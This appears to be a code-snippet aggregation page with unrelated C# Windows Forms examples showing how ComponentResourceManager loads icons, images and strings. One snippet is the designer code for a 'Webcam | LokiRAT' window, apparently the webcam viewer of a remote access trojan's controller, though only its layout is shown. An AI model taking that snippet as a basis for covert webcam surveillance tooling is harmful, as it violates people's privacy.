/// <summary> 
        /// Required method for Designer support - do not modify 
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FlashView));
            this.flashMovie = new AxShockwaveFlashObjects.AxShockwaveFlash();
            ((System.ComponentModel.ISupportInitialize)(this.flashMovie)).BeginInit();
            this.SuspendLayout();
            // 
            // flashMovie
            // 
            this.flashMovie.Dock = System.Windows.Forms.DockStyle.Fill;
            this.flashMovie.Enabled = true;
            this.flashMovie.Location = new System.Drawing.Point(0, 0);
            this.flashMovie.Name = "flashMovie";
            this.flashMovie.OcxState = ((System.Windows.Forms.AxHost.State)(resources.GetObject("flashMovie.OcxState")));
            this.flashMovie.Size = new System.Drawing.Size(571, 367);
            this.flashMovie.TabIndex = 0;
            // 
            // FlashView
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.Controls.Add(this.flashMovie);
            this.Name = "FlashView";
            this.Load += new EventHandler(this.FlashViewLoad);
            this.Size = new System.Drawing.Size(571, 367);
            ((System.ComponentModel.ISupportInitialize)(this.flashMovie)).EndInit();
            this.ResumeLayout(false);

        }
Example #2
0
 private void InitializeComponent()
 {
     this.components = new Container();
     ComponentResourceManager manager = new ComponentResourceManager(typeof(webcam));
     this.contextMenuStrip1 = new ContextMenuStrip(this.components);
     this.newWebcamToolStripMenuItem = new ToolStripMenuItem();
     this.saveToolStripMenuItem = new ToolStripMenuItem();
     this.toolStripSeparator1 = new ToolStripSeparator();
     this.refreshToolStripMenuItem = new ToolStripMenuItem();
     this.timer1 = new System.Windows.Forms.Timer(this.components);
     this.pictureBox1 = new PictureBox();
     this.saveFileDialog1 = new SaveFileDialog();
     this.contextMenuStrip1.SuspendLayout();
     ((ISupportInitialize) this.pictureBox1).BeginInit();
     base.SuspendLayout();
     this.contextMenuStrip1.Items.AddRange(new ToolStripItem[] { this.newWebcamToolStripMenuItem, this.saveToolStripMenuItem, this.toolStripSeparator1, this.refreshToolStripMenuItem });
     this.contextMenuStrip1.Name = "contextMenuStrip1";
     this.contextMenuStrip1.Size = new Size(0x8b, 0x4c);
     this.newWebcamToolStripMenuItem.Image = (Image) manager.GetObject("newWebcamToolStripMenuItem.Image");
     this.newWebcamToolStripMenuItem.Name = "newWebcamToolStripMenuItem";
     this.newWebcamToolStripMenuItem.Size = new Size(0x8a, 0x16);
     this.newWebcamToolStripMenuItem.Text = "New Picture";
     this.newWebcamToolStripMenuItem.Click += new EventHandler(this.newWebcamToolStripMenuItem_Click);
     this.saveToolStripMenuItem.Image = (Image) manager.GetObject("saveToolStripMenuItem.Image");
     this.saveToolStripMenuItem.Name = "saveToolStripMenuItem";
     this.saveToolStripMenuItem.Size = new Size(0x8a, 0x16);
     this.saveToolStripMenuItem.Text = "Save";
     this.saveToolStripMenuItem.Click += new EventHandler(this.saveToolStripMenuItem_Click);
     this.toolStripSeparator1.Name = "toolStripSeparator1";
     this.toolStripSeparator1.Size = new Size(0x87, 6);
     this.refreshToolStripMenuItem.Image = (Image) manager.GetObject("refreshToolStripMenuItem.Image");
     this.refreshToolStripMenuItem.Name = "refreshToolStripMenuItem";
     this.refreshToolStripMenuItem.Size = new Size(0x8a, 0x16);
     this.refreshToolStripMenuItem.Text = "Refresh";
     this.refreshToolStripMenuItem.Click += new EventHandler(this.refreshToolStripMenuItem_Click);
     this.timer1.Enabled = true;
     this.timer1.Interval = 500;
     this.timer1.Tick += new EventHandler(this.timer1_Tick);
     this.pictureBox1.ContextMenuStrip = this.contextMenuStrip1;
     this.pictureBox1.Dock = DockStyle.Fill;
     this.pictureBox1.Location = new Point(0, 0);
     this.pictureBox1.Name = "pictureBox1";
     this.pictureBox1.Size = new Size(0x299, 0x1f9);
     this.pictureBox1.TabIndex = 1;
     this.pictureBox1.TabStop = false;
     this.saveFileDialog1.FileName = "webcam.jpg";
     this.saveFileDialog1.Filter = "JPG pictures|*.jpg|All Files|*.*";
     this.saveFileDialog1.FileOk += new CancelEventHandler(this.saveFileDialog1_FileOk);
     base.AutoScaleDimensions = new SizeF(6f, 13f);
     base.AutoScaleMode = AutoScaleMode.Font;
     base.ClientSize = new Size(0x299, 0x1f9);
     base.Controls.Add(this.pictureBox1);
     base.Icon = (Icon) manager.GetObject("$this.Icon");
     base.Name = "webcam";
     this.Text = "Webcam | LokiRAT";
     this.contextMenuStrip1.ResumeLayout(false);
     ((ISupportInitialize) this.pictureBox1).EndInit();
     base.ResumeLayout(false);
 }
Example #3
0
 public UMTSCellNeighborForm(UMTSCell umtsCell, CollectionsModel model)
 {
     this.InitializeComponent();
     this.m_curUMTSCell = umtsCell;
     this.m_UMTSColl = model.UMTSCellColl;
     manager = new ComponentResourceManager(typeof(UMTSCellNeighborForm));
     this.dgvInter.UncheckedColHeaderText = (List<string>)manager.GetObject("dgvNeighborsListDiff.UncheckedColHeaderText");
     this.dgvInterTechnology.UncheckedColHeaderText = (List<string>)manager.GetObject("dataGridViewBase1.UncheckedColHeaderText");
 }
Example #4
0
        public MFDisplay()
        {
            InitializeComponent();

            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(MFDisplay));
          
            if (this.IsInDesignMode)
            {
                this.objXMFDisplay = new Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay();
            }
            else
            {
                this.objXMFDisplay = ImplementationResolver.Resolve("AxObjectXMFDisplay");
            }

            ((System.ComponentModel.ISupportInitialize)(this.objXMFDisplay)).BeginInit();

            this.SuspendLayout();
            // 
            // objXMFDisplay
            // 
            if (this.IsInDesignMode)
            {
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).Dock = System.Windows.Forms.DockStyle.Fill;
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).Enabled = true;
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).Location = new System.Drawing.Point(0, 0);
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).Name = "objXMFDisplay";
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).OcxState = ((System.Windows.Forms.AxHost.State)(resources.GetObject("objXMFDisplay.OcxState")));
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).Size = new System.Drawing.Size(480, 320);
                (this.objXMFDisplay as Carubbi.ObjectXMFDisplay.AxObjectXMFDisplay).TabIndex = 0;
            }
            else
            {
                this.objXMFDisplay.Call("CreateControl");
                this.objXMFDisplay.SetProperty("Dock", System.Windows.Forms.DockStyle.Fill);
                this.objXMFDisplay.SetProperty("Enabled", true);
                this.objXMFDisplay.SetProperty("Location", new System.Drawing.Point(0, 0));
                this.objXMFDisplay.SetProperty("Name", "objXMFDisplay");
                this.objXMFDisplay.SetProperty("OcxState", ((System.Windows.Forms.AxHost.State)(resources.GetObject("objXMFDisplay.OcxState"))));
                this.objXMFDisplay.SetProperty("Size", new System.Drawing.Size(480, 320));
                this.objXMFDisplay.SetProperty("TabIndex", 0);
                this.objXMFDisplay.SetProperty("EventVersion", 1);
                this.objXMFDisplay.SetProperty("CharacterSetID2", 32);
                this.objXMFDisplay.SetProperty("FontTypeFace", "Term3270");
                this.objXMFDisplay.SetProperty("AutoFont", true);
                this.objXMFDisplay.SetProperty("AutoFontMinimumWidth", 2);
                this.objXMFDisplay.SetProperty("CharacterCase", false);
                this.objXMFDisplay.SetProperty("ClipboardConfiguration", 0);
                this.objXMFDisplay.SetProperty("CursorBlinkRate", 1000);
                this.objXMFDisplay.SetProperty("ShowLightPenCursor", true);
                this.objXMFDisplay.SetProperty("WatermarkConfiguration", 0);
            }

            this.Controls.Add(this.objXMFDisplay as Control);
            ((System.ComponentModel.ISupportInitialize)(this.objXMFDisplay)).EndInit();
            this.ResumeLayout(false);
        }
Example #5
0
 public Form1()
 {
     //this.Visible = true;
     InitializeComponent();
     ComponentResourceManager resources = new ComponentResourceManager(typeof(Form1));
     _iconOn = (Icon)resources.GetObject("notifyIconOn.Icon");
     _iconOff = (Icon)resources.GetObject("notifyIconOff.Icon");
     this.ToggleKeepAwakeState();
     this.notifyIcon1.Visible = true;
 }
 public MAIN()
 {
     InitializeComponent();
     //init menu images
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(MAIN));
     copyToolStripMenuItem.Image = ((System.Drawing.Image)(resources.GetObject("copyToolStripButton.Image")));
     cutToolStripMenuItem.Image = ((System.Drawing.Image)(resources.GetObject("cutToolStripButton.Image")));
     pasteToolStripMenuItem.Image = ((System.Drawing.Image)(resources.GetObject("pasteToolStripButton.Image")));
     //ScpIndexer.LoadScpCmd();
     //ScriptCommunityPack.LoadKeywords();
 }
    public TreeExampleUserControl() {
      var resources = new ComponentResourceManager(typeof(TreeExampleUserControl));
      InitializeComponent(resources);

      foreach (var image in new[] {"level1", "level2", "level3" } )
        _level.Add(((Bitmap) (resources.GetObject(image))));

      ThemeResolutionService.ApplyThemeToControlTree(this, "TelerikMetroBlue");

      var item = new RadMenuItem("None");
      item.Click += item_Click;
      radDropDownButton1.Items.Add(item);

      item = new RadMenuItem("Alphabetically");
      item.Click += item_Click;
      radDropDownButton1.Items.Add(item);

      var searchIcon = new ImagePrimitive { Image = ((Image) (resources.GetObject("TV_search"))), Alignment = ContentAlignment.MiddleRight };
      radTextBox1.TextBoxElement.Children.Add(searchIcon);
      radTextBox1.TextBoxElement.TextBoxItem.Alignment = ContentAlignment.MiddleLeft;
      radTextBox1.TextBoxElement.TextBoxItem.PropertyChanged += TextBoxItem_PropertyChanged;
      radTreeView1.TreeViewElement.AllowAlternatingRowColor = true;
      radTreeView1.AllowEdit = false;
      radTreeView1.AllowAdd = false;
      radTreeView1.AllowRemove = false;
      radTreeView1.ItemHeight = 34;
      radTreeView1.AllowDefaultContextMenu = false;

      AutoScroll = false;

      radPanel3.PanelElement.PanelFill.BackColor = Color.White;
      radPanel3.BackColor = Color.White;
      radPanel3.PanelElement.PanelFill.GradientStyle = GradientStyles.Solid;
      radPanel3.PanelElement.PanelBorder.TopColor = Color.FromArgb(196, 199, 182);
      radPanel3.PanelElement.PanelBorder.LeftColor = Color.FromArgb(196, 199, 182);
      radPanel3.PanelElement.PanelBorder.RightColor = Color.FromArgb(196, 199, 182);
      radPanel3.PanelElement.PanelBorder.BottomColor = Color.White;
      radPanel3.PanelElement.PanelBorder.BoxStyle = BorderBoxStyle.FourBorders;
      radPanel3.PanelElement.PanelBorder.BorderDrawMode = BorderDrawModes.VerticalOverHorizontal;
      radPanel3.PanelElement.PanelBorder.GradientStyle = GradientStyles.Solid;

      radPanel1.PanelElement.PanelFill.BackColor = Color.FromArgb(26, 93, 192);
      radPanel1.PanelElement.PanelFill.GradientStyle = GradientStyles.Solid;
      radPanel1.PanelElement.PanelBorder.Visibility = ElementVisibility.Collapsed;
      radPanel1.PanelElement.Font = new Font("Segoe UI Light", 20, FontStyle.Regular);
      radPanel1.ForeColor = Color.White;
      radPanel1.PanelElement.Padding = new Padding(8, 2, 2, 2);
      radPanel1.Text = @"Music Collection";
    }
Example #8
0
 public ZoomBar()
     : base(new ZoomTracker())
 {
     //load .resx
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(ZoomBar));
     zoom_in = (Bitmap)resources.GetObject("zoom_in");
     zoom_out = (Bitmap)resources.GetObject("zoom_out");
     //
     HMiniTracker tracker = this.Control as ZoomTracker;
     tracker.Width = 120;
     tracker.Assign(5, ScaleFactor.CommonZooms.Length - 1, 0);
     tracker.ValueChanged += new ValueChangedEH(tracker_ValueChanged);
     //make room for buttons
     this.Padding = new Padding(20, 0, 20, 0);
 }
 /// <summary> 
 /// �����֧������ķ��� - ��Ҫʹ�ô���༭�� 
 /// �޸Ĵ˷��������ݡ�
 /// </summary>
 private void InitializeComponent()
 {
     this.components = new System.ComponentModel.Container();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(NavigationControl));
     this.imageTree2 = new System.Windows.Forms.ImageList(this.components);
     this.Tree = new System.Windows.Forms.TreeView();
     this.imageList1 = new System.Windows.Forms.ImageList(this.components);
     this.SuspendLayout();
     //
     // imageTree2
     //
     this.imageTree2.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageTree2.ImageStream")));
     this.imageTree2.TransparentColor = System.Drawing.Color.Transparent;
     this.imageTree2.Images.SetKeyName(0, "folder_closed_ii.ico");
     this.imageTree2.Images.SetKeyName(1, "desktop.ico");
     this.imageTree2.Images.SetKeyName(2, "closed_floder.ico");
     this.imageTree2.Images.SetKeyName(3, "calendar.ico");
     //
     // Tree
     //
     this.Tree.BorderStyle = System.Windows.Forms.BorderStyle.None;
     this.Tree.Dock = System.Windows.Forms.DockStyle.Fill;
     this.Tree.ImageIndex = 0;
     this.Tree.ImageList = this.imageTree2;
     this.Tree.Location = new System.Drawing.Point(0, 0);
     this.Tree.Name = "Tree";
     this.Tree.SelectedImageIndex = 0;
     this.Tree.Size = new System.Drawing.Size(200, 400);
     this.Tree.TabIndex = 0;
     this.Tree.AfterSelect += new System.Windows.Forms.TreeViewEventHandler(this.Tree_AfterSelect);
     //
     // imageList1
     //
     this.imageList1.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageList1.ImageStream")));
     this.imageList1.TransparentColor = System.Drawing.Color.Transparent;
     this.imageList1.Images.SetKeyName(0, "folder_close2.ico");
     this.imageList1.Images.SetKeyName(1, "folder_open.ico");
     this.imageList1.Images.SetKeyName(2, "closed_floder.ico");
     this.imageList1.Images.SetKeyName(3, "folder2.ico");
     this.imageList1.Images.SetKeyName(4, "opened_folder2.ico");
     //
     // NavigationControl
     //
     this.Controls.Add(this.Tree);
     this.Name = "NavigationControl";
     this.Size = new System.Drawing.Size(200, 400);
     this.ResumeLayout(false);
 }
Example #10
0
 private void InitializeComponent()
 {
     this.components = (IContainer)new Container();
     ComponentResourceManager resources = new ComponentResourceManager(typeof(about));
     this.pictureBox1 = new PictureBox();
     this.richTextBox1 = new RichTextBox();
     this.richTextBox2 = new RichTextBox();
     ((ISupportInitialize)this.pictureBox1).BeginInit();
     this.SuspendLayout();
     this.pictureBox1.Image = (Image)resources.GetObject("pictureBox1.Image");
     this.pictureBox1.Location = new Point(14, 16);
     this.pictureBox1.Margin = new Padding(3, 4, 3, 4);
     this.pictureBox1.Name = "pictureBox1";
     this.pictureBox1.Size = new Size(128, 128);
     this.pictureBox1.SizeMode = PictureBoxSizeMode.AutoSize;
     this.pictureBox1.TabIndex = 0;
     this.pictureBox1.TabStop = false;
     this.richTextBox1.Font = new Font("Arial Unicode MS", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte)134);
     this.richTextBox1.Location = new Point(148, 13);
     this.richTextBox1.Margin = new Padding(3, 4, 3, 4);
     this.richTextBox1.Name = "richTextBox1";
     this.richTextBox1.ReadOnly = true;
     this.richTextBox1.Size = new Size(333, 131);
     this.richTextBox1.TabIndex = 1;
     this.richTextBox1.Text = resources.GetString("richTextBox1.Text");
     this.richTextBox2.Location = new Point(14, 151);
     this.richTextBox2.Name = "richTextBox2";
     this.richTextBox2.ReadOnly = true;
     this.richTextBox2.ScrollBars = RichTextBoxScrollBars.None;
     this.richTextBox2.Size = new Size(467, 249);
     this.richTextBox2.TabIndex = 2;
     this.richTextBox2.Text = resources.GetString("richTextBox2.Text");
     this.AutoScaleDimensions = new SizeF(7f, 16f);
     this.AutoScaleMode = AutoScaleMode.Font;
     this.ClientSize = new Size(496, 412);
     this.Controls.Add((Control)this.richTextBox2);
     this.Controls.Add((Control)this.richTextBox1);
     this.Controls.Add((Control)this.pictureBox1);
     this.Font = new Font("Arial Unicode MS", 9f, FontStyle.Regular, GraphicsUnit.Point, (byte)0);
     this.Icon = (Icon)resources.GetObject("$this.Icon");
     this.Margin = new Padding(3, 4, 3, 4);
     this.MaximizeBox = false;
     this.Name = "about";
     this.Text = "About HopeRF";
     ((ISupportInitialize)this.pictureBox1).EndInit();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 public ActivityBindForm(IServiceProvider serviceProvider, ITypeDescriptorContext context)
 {
     this.context = context;
     this.serviceProvider = serviceProvider;
     this.InitializeComponent();
     this.createProperty.Checked = true;
     this.helpTextBox.Multiline = true;
     IUIService service = (IUIService) this.serviceProvider.GetService(typeof(IUIService));
     if (service != null)
     {
         this.Font = (Font) service.Styles["DialogFont"];
     }
     ComponentResourceManager manager = new ComponentResourceManager(typeof(ActivityBindForm));
     this.ActivityBindDialogTitleFormat = manager.GetString("ActivityBindDialogTitleFormat");
     this.PropertyAssignableFormat = manager.GetString("PropertyAssignableFormat");
     this.DescriptionFormat = manager.GetString("DescriptionFormat");
     this.EditIndex = manager.GetString("EditIndex");
     this.PleaseSelectCorrectActivityProperty = manager.GetString("PleaseSelectCorrectActivityProperty");
     this.PleaseSelectActivityProperty = manager.GetString("PleaseSelectActivityProperty");
     this.IncorrectIndexChange = manager.GetString("IncorrectIndexChange");
     this.CreateNewMemberHelpFormat = manager.GetString("CreateNewMemberHelpFormat");
     this.memberTypes = new ImageList();
     this.memberTypes.ImageStream = (ImageListStreamer) manager.GetObject("memberTypes.ImageStream");
     this.memberTypes.TransparentColor = AmbientTheme.TransparentColor;
     this.properties = CustomActivityDesignerHelper.GetCustomProperties(context);
 }
Example #12
0
		//private System.ComponentModel.IContainer components;

		#region Windows Form Designer generated code
		private void InitializeComponent()
		{
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(ViewForm));
            this.SuspendLayout();
            // 
            // ViewForm
            // 
            this.AccessibleRole = System.Windows.Forms.AccessibleRole.Window;
            this.AutoScaleBaseSize = new System.Drawing.Size(5, 12);
            this.ClientSize = new System.Drawing.Size(464, 322);
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name = "ViewForm";
            this.Text = "ビューア";
            this.WindowState = System.Windows.Forms.FormWindowState.Maximized;
            this.Paint += new System.Windows.Forms.PaintEventHandler(this.ViewForm_Paint);
            this.Closed += new System.EventHandler(this.onClosed);
            this.ResumeLayout(false);
            this.Paint += new System.Windows.Forms.PaintEventHandler(this.ViewForm_Paint);
            this.MouseMove += new System.Windows.Forms.MouseEventHandler(this.onMouseMove);
            this.MouseDoubleClick += new System.Windows.Forms.MouseEventHandler(this.onMouseDoubleClick);
            this.MouseDown += new System.Windows.Forms.MouseEventHandler(this.onMouseDown);
            this.MouseUp += new System.Windows.Forms.MouseEventHandler(this.onMouseUp);
            this.SizeChanged += new System.EventHandler(this.ViewForm_SizeChanged);
            this.MouseEnter += new System.EventHandler(this.onMouseEnter);
            this.MouseWheel += new System.Windows.Forms.MouseEventHandler(this.onMouseWheel);
            this.KeyUp += new System.Windows.Forms.KeyEventHandler(this.onKeyUp);
            this.KeyDown += new System.Windows.Forms.KeyEventHandler(this.onKeyDown);
		}
Example #13
0
        public CecButtonConfigUI(CecButtonConfigItem button)
        {
            _button = button;
              InitializeComponent();

              var keys = Enum.GetValues(typeof (WindowsAPI.VirtualKeyCode));
              string[] friendlyNames = new string[keys.Length];
              for (int i = 0; i < keys.Length; i++)
            friendlyNames[i] = WindowsAPI.GetVirtualKeyName((WindowsAPI.VirtualKeyCode)keys.GetValue(i));
              Array.Sort(friendlyNames);
              foreach (var item in friendlyNames)
            cbAddKey.Items.Add(item);

              button.SettingChanged += delegate
                                 {
                                   _lastSelectedText = 0;
                                   tbAction.Text = button.Value.AsFriendlyString().Trim();
                                 };

              lButtonName.Text = button.Label.Text;
              tbAction.Text = button.Value.AsFriendlyString().Trim();

              //TODO
              cbAddAction.Items.Add(ApplicationInput.FriendlyActionName(ActionType.CloseControllerApplication));
              cbAddAction.Items.Add(ApplicationInput.FriendlyActionName(ActionType.StartApplication));

              // take the icon of the main window
              ComponentResourceManager resources = new ComponentResourceManager(typeof(CECTray));
              Icon = resources.GetObject("$this.Icon") as Icon;
        }
Example #14
0
 private void InitializeComponent()
 {
     ComponentResourceManager resources = new ComponentResourceManager(typeof(HelpForm));
     this.docViewer = new WebBrowser();
     base.SuspendLayout();
     this.docViewer.AllowWebBrowserDrop = false;
     this.docViewer.Dock = DockStyle.Fill;
     this.docViewer.IsWebBrowserContextMenuEnabled = false;
     this.docViewer.Location = new Point(0, 0);
     this.docViewer.MinimumSize = new Size(20, 20);
     this.docViewer.Name = "docViewer";
     this.docViewer.Size = new Size(0x124, 0x252);
     this.docViewer.TabIndex = 2;
     this.docViewer.TabStop = false;
     this.docViewer.Url = new Uri("", UriKind.Relative);
     this.docViewer.WebBrowserShortcutsEnabled = false;
     base.AutoScaleDimensions = new SizeF(6f, 13f);
     base.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
     base.ClientSize = new Size(0x124, 0x252);
     base.Controls.Add(this.docViewer);
     base.Icon = (Icon) resources.GetObject("$this.Icon");
     base.Name = "HelpForm";
     base.StartPosition = FormStartPosition.Manual;
     this.Text = "HelpForm";
     base.ResumeLayout(false);
 }
        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(GetUDiskInfo));
            this.listBox1 = new System.Windows.Forms.ListBox();
            this.SuspendLayout();
            // 
            // listBox1
            // 
            this.listBox1.FormattingEnabled = true;
            this.listBox1.ItemHeight = 12;
            this.listBox1.Location = new System.Drawing.Point(46, 30);
            this.listBox1.Name = "listBox1";
            this.listBox1.Size = new System.Drawing.Size(120, 88);
            this.listBox1.TabIndex = 0;
            this.listBox1.MouseDoubleClick += new System.Windows.Forms.MouseEventHandler(this.listBox1_MouseDoubleClick);
            // 
            // GetUDiskInfo
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.AutoSize = true;
            this.ClientSize = new System.Drawing.Size(584, 441);
            this.Controls.Add(this.listBox1);
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name = "GetUDiskInfo";
            this.ShowInTaskbar = false;
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "选择安全U盘";
            this.Load += new System.EventHandler(this.GetUDiskInfo_Load);
            this.ResumeLayout(false);

        }
 public DropDownCheckBox()
 {
     _focudPen = new Pen(Color.FromArgb(127, 157, 185), 1);
     _focudPen.DashStyle = System.Drawing.Drawing2D.DashStyle.Dash;
     _borderPenEnabled = new Pen(Color.FromArgb(127, 157, 185), 1);
     _borderPenDisabled = new Pen(Color.FromArgb(201, 199, 186), 1);
     _borderPen = _borderPenEnabled;
     InitializeComponent();
     ComponentResourceManager resources = new ComponentResourceManager(typeof(DropDownCheckBox));
     _img_dropdown = ((System.Drawing.Image)(resources.GetObject("dropdown")));
     _img_dropdown_over = ((System.Drawing.Image)(resources.GetObject("dropdown_over")));
     _img_dropdown_click = ((System.Drawing.Image)(resources.GetObject("dropdown_click")));
     _img_dropdown_disabled = ((System.Drawing.Image)(resources.GetObject("dropdown_disabled")));
     btDrop.Image = _img_dropdown;
     btDrop.InitialImage = _img_dropdown;
 }
Example #17
0
        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(About));
            this.lblVersion = new System.Windows.Forms.Label();
            this.pictureBox1 = new System.Windows.Forms.PictureBox();
            this.linkWebsite = new System.Windows.Forms.LinkLabel();
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
            this.SuspendLayout();
            // 
            // lblVersion
            // 
            this.lblVersion.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.lblVersion.Location = new System.Drawing.Point(64, 12);
            this.lblVersion.Name = "lblVersion";
            this.lblVersion.Size = new System.Drawing.Size(266, 24);
            this.lblVersion.TabIndex = 0;
            this.lblVersion.Text = "dotNetInstaller Installer Editor";
            // 
            // pictureBox1
            // 
            this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
            this.pictureBox1.Location = new System.Drawing.Point(12, 12);
            this.pictureBox1.Name = "pictureBox1";
            this.pictureBox1.Size = new System.Drawing.Size(48, 48);
            this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage;
            this.pictureBox1.TabIndex = 1;
            this.pictureBox1.TabStop = false;
            // 
            // linkWebsite
            // 
            this.linkWebsite.AutoSize = true;
            this.linkWebsite.Location = new System.Drawing.Point(66, 36);
            this.linkWebsite.Name = "linkWebsite";
            this.linkWebsite.Size = new System.Drawing.Size(177, 13);
            this.linkWebsite.TabIndex = 3;
            this.linkWebsite.TabStop = true;
            this.linkWebsite.Text = "http://dotnetinstaller.codeplex.com/";
            this.linkWebsite.LinkClicked += new System.Windows.Forms.LinkLabelLinkClickedEventHandler(this.linkWebsite_LinkClicked);
            // 
            // About
            // 
            this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
            this.ClientSize = new System.Drawing.Size(324, 89);
            this.Controls.Add(this.linkWebsite);
            this.Controls.Add(this.pictureBox1);
            this.Controls.Add(this.lblVersion);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
            this.MaximizeBox = false;
            this.MinimizeBox = false;
            this.Name = "About";
            this.ShowInTaskbar = false;
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
            this.Text = "About";
            this.Load += new System.EventHandler(this.About_Load);
            this.KeyUp += new System.Windows.Forms.KeyEventHandler(this.About_KeyUp);
            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
            this.ResumeLayout(false);
            this.PerformLayout();

        }
		public ConfigurarVelocidadMaxima ()
		{
			Label texto = new Label();
			texto.Location = new Point (10,10);
			texto.Size = new Size (110, 20);
			texto.Text = "Velocidad Maxima:";
			texto.Anchor = ((AnchorStyles)(AnchorStyles.Left | AnchorStyles.Top));

			entrada = new TextBox ();
			entrada.Location = new Point (130, 10);
			entrada.Size = new Size (200, 20);
			entrada.Text = "50";
			entrada.Anchor = ((AnchorStyles)(AnchorStyles.Left | AnchorStyles.Top | AnchorStyles.Right | AnchorStyles.Bottom));

			aceptar = new Button ();
			aceptar.Text = "Aceptar";
			aceptar.Location = new Point (280,40);
			aceptar.Size = new Size (50, 23);
			aceptar.Anchor = ((AnchorStyles)(AnchorStyles.Right | AnchorStyles.Left | AnchorStyles.Top | AnchorStyles.Bottom));
			aceptar.Click += new EventHandler (eventoAceptar);

			this.Text = "Configuración - Velocidad Maxima";
			this.ClientSize = new Size (340 , 70);
			ComponentResourceManager recurso = new ComponentResourceManager(typeof(Ventana));
			this.Icon = (Icon)(recurso.GetObject("$this.Icon"));

			Controls.Add (texto);
			Controls.Add (entrada);
			Controls.Add (aceptar);
		}
Example #19
0
 private void InitializeComponent()
 {
     ComponentResourceManager resources = new ComponentResourceManager(typeof(Win_DataFilterBlockDiagram));
     this.pictureBox1 = new PictureBox();
     this.btnClose = new Button();
     ((ISupportInitialize) this.pictureBox1).BeginInit();
     base.SuspendLayout();
     this.pictureBox1.BackColor = Color.Transparent;
     this.pictureBox1.Image = (Image) resources.GetObject("pictureBox1.Image");
     this.pictureBox1.Location = new Point(0, 0);
     this.pictureBox1.Name = "pictureBox1";
     this.pictureBox1.Size = new Size(0x223, 460);
     this.pictureBox1.TabIndex = 0;
     this.pictureBox1.TabStop = false;
     this.btnClose.Location = new Point(0xea, 0x1d0);
     this.btnClose.Name = "btnClose";
     this.btnClose.Size = new Size(0x61, 0x17);
     this.btnClose.TabIndex = 2;
     this.btnClose.Text = "Close";
     this.btnClose.UseVisualStyleBackColor = true;
     this.btnClose.Click += new EventHandler(this.btnClose_Click);
     base.AutoScaleMode = System.Windows.Forms.AutoScaleMode.None;
     this.BackColor = SystemColors.Control;
     base.ClientSize = new Size(0x224, 0x1f0);
     base.Controls.Add(this.btnClose);
     base.Controls.Add(this.pictureBox1);
     base.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedToolWindow;
     base.MaximizeBox = false;
     base.MinimizeBox = false;
     base.Name = "Win_DataFilterBlockDiagram";
     base.ShowIcon = false;
     this.Text = "Data Filter Block Diagram";
     ((ISupportInitialize) this.pictureBox1).EndInit();
     base.ResumeLayout(false);
 }
		/// <summary>
		/// Required method for Designer support - do not modify
		/// the contents of this method with the code editor.
		/// </summary>
		private void InitializeComponent()
		{
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(UpdatesWindow));
            this.webBrowser1 = new System.Windows.Forms.WebBrowser();
            this.SuspendLayout();
            // 
            // webBrowser1
            // 
            this.webBrowser1.Dock = System.Windows.Forms.DockStyle.Fill;
            this.webBrowser1.Location = new System.Drawing.Point(0, 0);
            this.webBrowser1.MinimumSize = new System.Drawing.Size(20, 20);
            this.webBrowser1.Name = "webBrowser1";
            this.webBrowser1.Size = new System.Drawing.Size(794, 572);
            this.webBrowser1.TabIndex = 0;
            this.webBrowser1.Url = new System.Uri("", System.UriKind.Relative);
            // 
            // UpdatesWindow
            // 
            this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
            this.BackColor = System.Drawing.SystemColors.Control;
            this.ClientSize = new System.Drawing.Size(794, 572);
            this.Controls.Add(this.webBrowser1);
